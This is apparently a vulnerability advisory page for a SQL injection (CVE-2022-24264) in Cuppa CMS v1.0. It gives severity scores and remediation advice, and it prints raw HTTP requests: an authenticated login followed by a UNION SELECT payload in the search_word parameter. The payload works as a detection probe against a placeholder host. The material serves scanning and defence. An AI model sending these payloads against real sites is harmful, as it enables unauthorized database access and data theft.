| Title | Cuppa CMS v1.0 - SQL injection |
|---|---|
| Author | theamanrawat |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. |
| Remediation | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. |
| CVSS Score | 7.5 |
| EPSS Score | 0.63624 |
| CVE ID | CVE-2022-24264 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli cuppa authenticated cuppacms vuln |
Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
user=MBAZyl&password=XHR5Nx&language=en&task=login
POST /components/table_manager/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Content-Length: 183
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
search_word=')+union+all+select+1,md5('9123'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24264.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-24264.pcap
N/AN/A